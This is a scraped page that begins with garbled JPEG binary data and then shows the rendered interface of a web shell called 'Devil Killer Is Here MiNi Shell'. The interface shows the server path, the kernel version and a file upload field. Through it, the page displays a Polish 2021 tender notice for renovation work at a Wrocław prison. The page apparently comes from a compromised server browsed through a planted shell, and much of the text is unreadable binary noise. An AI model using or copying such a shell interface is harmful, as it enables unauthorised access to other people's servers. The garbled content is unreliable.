JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210702/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210702/0010286401-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00102864 z dnia 2021-07-02</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa pomieszczeń obiektu nr 9 przeznaczonych na działalność produkcyjną wraz z infrastrukturą towarzyszącą w Zakładzie Karnym Nr 1 we Wrocławiu. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Karny Nr 1 we Wrocławiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000320549</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kleczkowska 35</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">50-211</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">713272600</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">713291772</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zk_1_wroclaw@sw.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://sw.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> jednostka organizacyjna - Zakład Karny </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa pomieszczeń obiektu nr 9 przeznaczonych na działalność produkcyjną wraz z infrastrukturą towarzyszącą w Zakładzie Karnym Nr 1 we Wrocławiu. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-61bfd39a-db20-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00102864</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00008419/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Przebudowa pomieszczeń obiektu nr 9 przeznaczonych na działalność produkcyjną wraz z infrastrukturą towarzyszącą w Zakładzie Karnym Nr 1 we Wrocławiu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.12.) Rodzaj wykonawców, którzy mogą ubiegać się o udzielenie zamówienia: </h3> <p class="mb-0">art. 94 ust. 1 pkt 5) ustawy</p> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/, https://zp.sw.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">8.1. Komunikacja w postępowaniu o udzielenie zamówienia i w konkursie, w tym składanie ofert, wniosków o dopuszczenie do udziału w postępowaniu lub konkursie, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą,<br/>z uwzględnieniem wyjątków określonych w ustawie Prawo zamówień publicznych, odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w Ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz.U. z 2020 r. poz. 344).<br/> 8.2. Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 Pzp (stanowiące załącznik<br/>nr 4 i 5 do SWZ), podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych<br/>formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. podpisane kwalifikowanym podpisem elektronicznym, podpisem osobistym lub podpisem zaufanym pod rygorem nieważności.<br/> 8.3. Komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu:<br/> 8.3.1. miniPortalu https://miniportal.uzp.gov.pl<br/> 8.3.2. e-PUAPu https://epuap.gov.pl/wps.portal<br/> 8.4. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto na e-PUAP. Wykonawca posiadający konto na e-PUAP ma dostęp<br/>do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz formularza<br/>do komunikacji.<br/> 8.5. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy<br/>ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu oraz Regulaminie e-PUAP. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy<br/>do złożenia bądź wycofania oferty oraz do komunikacji wynosi 150MB.<br/> 8.6. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych,<br/>oświadczeń lub elektronicznych kopii dokumentów, lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na e-PUAP.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (zwanego dalej „RODO”), Zamawiający przedstawia następujące informacje:<br/> 39.1 administratorem danych osobowych jest Dyrektor Zakładu Karnego Nr 1 we	Wrocławiu, z siedzibą przy ul. Kleczkowskiej 35, 50-211 Wrocław, e mail:	zk_1_wroclaw@sw.gov.pl, tel. 71/32-72-600;<br/> 39.2 dane kontaktowe inspektora ochrony danych: e-mail: iod_1_wroclaw@sw.gov.pl;<br/> 39.3 dane osobowe będą przetwarzane na podstawie:<br/> 39.3.1 art. 6 ust. 1 lit. b RODO, ponieważ przetwarzanie jest niezbędne<br/>do wykonania umowy, w której reprezentantami Wykonawcy są osoby, których dane dotyczą, oraz do podjęcia działań na żądanie osób, których dane dotyczą, przed zawarciem umowy, w tym związanych z przeprowadzeniem postępowania, art. 6 ust. 1 lit. c RODO w celu wypełnienia obowiązku prawnego ciążącego<br/>na administratorze, o którym mowa w art. 2 ust. 2 Ustawy z dnia 9 kwietnia<br/>2010 r. o Służbie Więziennej (tekst jednolity: Dz.U. z 2019 r., poz. 1427 z późn.<br/>zm.) oraz art. 73a § 1 Ustawy z dnia 6 czerwca 1997 r. – Kodeks karny wykonawczy (tekst jednolity: Dz.U. z 2020 r., poz. 523 z późn. zm.). Monitoring obejmuje teren Zakładu Karnego Nr 1 we Wrocławiu oraz obszar bezpośrednio przyległy, a zapisy z monitoringu są przechowywane przez okres 7 dni;<br/> 39.4 obowiązek podania danych osobowych jest wymogiem ustawowym określonym<br/>w przepisach ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają<br/>z ustawy;<br/> 39.5 odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania o udzielenie zamówienia publicznego<br/>w oparciu o art. 8 oraz art. 96 ust. 3 ustawy;<br/> 39.6 w odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/> 39.7 dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy, przez okres<br/>4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmie cały czas trwania umowy;<br/> 39.8 przysługuje:<br/> 39.8.1 na podstawie art. 15 RODO prawo dostępu do danych osobowych,<br/> 39.8.2 na podstawie art. 16 RODO prawo do sprostowania danych osobowych,<br/>z zastrzeżeniem, że skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą oraz nie może naruszać integralności protokołu oraz jego załączników, <br/> 39.8.3 na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa<br/>w art. 18 ust. 2 RODO, z zastrzeżeniem, że prawo do ograniczenia przetwarzania<br/>nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej <br/>lub państwa członkowskiego,<br/> 39.8.4 prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych<br/>w przypadku uznania, że przetwarzanie danych osobowych narusza przepisy RODO.<br/> 39.9 nie przysługuje:<br/> 39.9.1 w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/> 39.9.2 prawo do przenoszenia danych osobowych, o których mowa w art. 20 RODO;<br/> 39.9.3 na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">D/Kw.2232.6.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 5.1 Przedmiotem zamówienia są roboty budowlane związane z przebudową pomieszczeń obiektu nr 9 przeznaczonych na działalność produkcyjną. Zakres robót:<br/> 5.1.1 roboty ogólnobudowlane obejmujące: <br/> 5.1.1.1 przebudowa stropu umożliwiając montaż wewnętrznej windy towarowej,<br/> 5.1.1.2 wykonanie przegród ppoż,<br/> 5.1.1.3 montaż drzwi zewnętrznych umożliwiających załadunek oraz rozładunek towarów,<br/> 5.1.1.4 wykonanie zabezpieczeń techniczno-ochronnych w postaci postawienia wygrodzenie wewnętrznego wraz z utwardzeniem terenu wydzielonego pasa ochronnego od bramy wjazdowej z dziedzińca głównego do bramy wjazdowej<br/>na plac przy budynku przeznaczonym na hale produkcyjną,<br/> 5.1.1.5 wymiana bramy wjazdowej zlokalizowanej w wygrodzeniu wewnętrznym, na którym zlokalizowany jest obiekt nr 9,<br/> 5.1.1.6 przystosowanie drogi dojazdowej;<br/> 5.1.2 roboty instalacyjne obejmujące:<br/> 5.1.2.1 wykonanie instalacji wentylacji mechanicznej wraz z klimatyzacją, instalacji sanitarnej, instalacji hydrantowej.<br/> 5.1.3 roboty elektryczne i infrastruktura teletechniczna obejmujące wykonanie:<br/> 5.1.3.1 systemu monitoringu wizualnego wewnątrz oraz na zewnątrz budynku, <br/> 5.1.3.2 rozbudowa rozdzielni elektrycznej montaż wyłącznika bezpieczeństwa zasilania głównego,<br/> 5.1.3.3 oświetlenie dodatkowe wewnątrz budynku,<br/> 5.1.3.4 oświetlenie zewnętrzne, wymiana przewodów oraz oświetlenia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111100-9 - Roboty w zakresie burzenia</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">45223110-0 - Instalowanie konstrukcji metalowych</p> <p class="mb-0">45262210-6 - Fundamentowanie</p> <p class="mb-0">45262212-0 - Kopanie rowów</p> <p class="mb-0">45262310-7 - Zbrojenie</p> <p class="mb-0">45262311-4 - Betonowanie konstrukcji</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45312100-8 - Instalowanie przeciwpożarowych systemów alarmowych</p> <p class="mb-0">45313100-5 - Instalowanie wind</p> <p class="mb-0">45316000-5 - Instalowanie systemów oświetleniowych i sygnalizacyjnych</p> <p class="mb-0">45317000-2 - Inne instalacje elektryczne</p> <p class="mb-0">45331210-1 - Instalowanie wentylacji</p> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45340000-2 - Instalowanie ogrodzeń, płotów i sprzętu ochronnego</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45442110-1 - Malowanie budynków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">17.1 Oferty zostaną ocenione za pomocą systemu punktowego, zgodnie z poniższymi kryteriami:<br/> 17.1.1 cena brutto oferty „C”– waga kryterium 60% dla całości zamówienia. <br/>W tym kryterium najwyższą liczbę 60 punktów otrzyma oferta zawierająca najniższą cenę brutto, a każda następna odpowiednio zgodnie ze wzorem: <br/>C = (Cmino / Cbo) x 60,<br/> gdzie: <br/> C – ilość punktów uzyskana przez badaną ofertę, <br/> Cmino – cena oferty z najniższą ceną brutto, <br/> Cbo – cena brutto oferty badanej. <br/>	Ilość uzyskanych punktów zostanie każdorazowo zaokrąglona do dwóch miejsc<br/>	po przecinku.<br/> 17.1.2 okres gwarancji „G” – waga kryterium 26% dla całości zamówienia.<br/>Długość okresu gwarancji będzie oceniana na podstawie sumy zadeklarowanego przez Wykonawcę w formularzu ofertowym wydłużonego okresu gwarancji na wykonane roboty i minimalnego wymaganego okresu gwarancji, wynoszącego 36 miesięcy. Okres gwarancji liczony jest od daty podpisania protokołu odbioru końcowego przedmiotu umowy. Zamawiający przyzna punkty za zadeklarowanie przez Wykonawcę okresu gwarancji w formularzu ofertowym według następujących zasad:<br/> 17.1.2.1 Oferta z okresem gwarancji 60 miesięcy – Zamawiający przyzna maksymalną liczbę punktów, tj. 26 pkt;<br/> 17.1.2.2 Oferta z okresem gwarancji dłuższym niż 60 miesięcy – Zamawiający	przyzna punkty w tym kryterium jak dla 60 miesięcy;<br/> 17.1.2.3 Oferta z okresem gwarancji równym 36 miesięcy – Zamawiający przyzna 0 pkt;<br/> 17.1.2.4 Oferta, która nie będzie wypełniona w żadnym z pól lub będzie błędnie wypełniona, będzie oznaczała, iż Wykonawca udziela gwarancji<br/> w minimalnym wymaganym przez Zamawiającego okresie, tj. 36 miesięcy – Zamawiający przyzna 0 pkt;<br/> 17.1.2.5 Pozostałe oferty zostaną ocenione zgodnie ze wzorem:<br/> (Ogof – Ogmin) / (Ogmax – Ogmin) x 26 = Og,<br/> gdzie:<br/> Ogof – termin zaoferowany w badanej ofercie, przy czym w przypadku zaoferowania terminu dłuższego, niż 60 miesięcy, do wzoru podstawione zostanie 60 miesięcy,<br/> Ogmin – 36 miesięcy,<br/> Ogmax – 60 miesięcy,<br/> Og – liczba punktów otrzymanych w kryterium okres gwarancji. <br/>Wykonawca może zaproponować okres gwarancji w ramach niniejszego zamówienia tylko w pełnych miesiącach. Wymagany minimalny okres gwarancji wynosi 36 miesięcy. Maksymalny punktowany okres gwarancji, to 60 miesięcy. Bez względu na powyższe: jeżeli warunki gwarancji udzielonej przez producenta materiałów i urządzeń wbudowanych przewidują dłuższy okres gwarancji, niż gwarancja udzielona przez Wykonawcę – obowiązuje okres gwarancji w wymiarze równym okresowi gwarancji producenta. Najkorzystniejsza oferta w odniesieniu do tego kryterium może uzyskać maksymalnie 26 punktów.<br/> 17.1.3 termin wykonania zamówienia – waga kryterium 14% dla całości zamówienia. Wykonawca w formularzu oferty deklaruje liczbę dni, o które skróci termin końcowy realizacji przedmiotu zamówienia. Zgodnie z wymaganiami Zamawiającego, umowę należy zrealizować do dnia 30 listopada 2021 r. (za dzień zakończenia uznaje<br/>się dzień podpisania protokołu końcowego przedmiotu umowy). Zamawiający przyzna punkty za zadeklarowanie przez Wykonawcę skrócenia terminu wykonania zamówienia w formularzu ofertowym według następujących zasad:<br/>17.1.3.1 Za każdy dzień skrócenia Zamawiający przyzna 1 pkt;<br/>17.1.3.2 Oferta ze skróceniem terminu o 14 dni – Zamawiający przyzna	maksymalną liczbę punktów, tj. 14 pkt;<br/>17.1.3.3 Oferta ze skróceniem terminu o więcej niż 14 dni – Zamawiający przyzna punkty w tym kryterium jak dla 14 dni;<br/> 17.1.3.4 Oferta, która nie będzie wypełniona w żadnym z pól lub będzie błędnie wypełniona będzie oznaczała, iż Wykonawca nie skraca terminu realizacji przedmiotu zamówienia, a jako termin realizacji zostanie przyjęty 30 listopada 2021 r. – Zamawiający przyzna 0 pkt.<br/>17.1.3.5 Maksymalna liczba punktów do uzyskania wynosi 14 i odpowiada skróceniu o 14 lub więcej dni.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">26</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">14</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 21.1 O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/> 21.1.1 zdolności do występowania w obrocie gospodarczym,<br/>Opis spełnienia warunku: <br/>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków w tym zakresie. Zamawiający nie dokona oceny spełnienia warunków udziałuw postępowaniu. <br/> 21.1.2 uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów,<br/>Opis spełnienia warunku: <br/>Dysponowania minimum jedną osobą, która będzie pełniła funkcję kierownika budowy i kierownika robót budowlanych posiadającą uprawnienia do kierowania robotami budowlanymi, która w dniu podpisania umowy będzie członkiem właściwej izby samorządu zawodowego, zgodnie z ustawą Prawo budowlane oraz ustawą o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów. Na potwierdzenie spełnienia warunku Wykonawca zobowiązany jest złożyć wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez<br/>nie czynności oraz informację o podstawie do dysponowania tymi osobami. - załącznik nr 7 do SWZ.<br/> 21.1.3 sytuacji ekonomicznej lub finansowej, <br/>Opis spełnienia warunku: 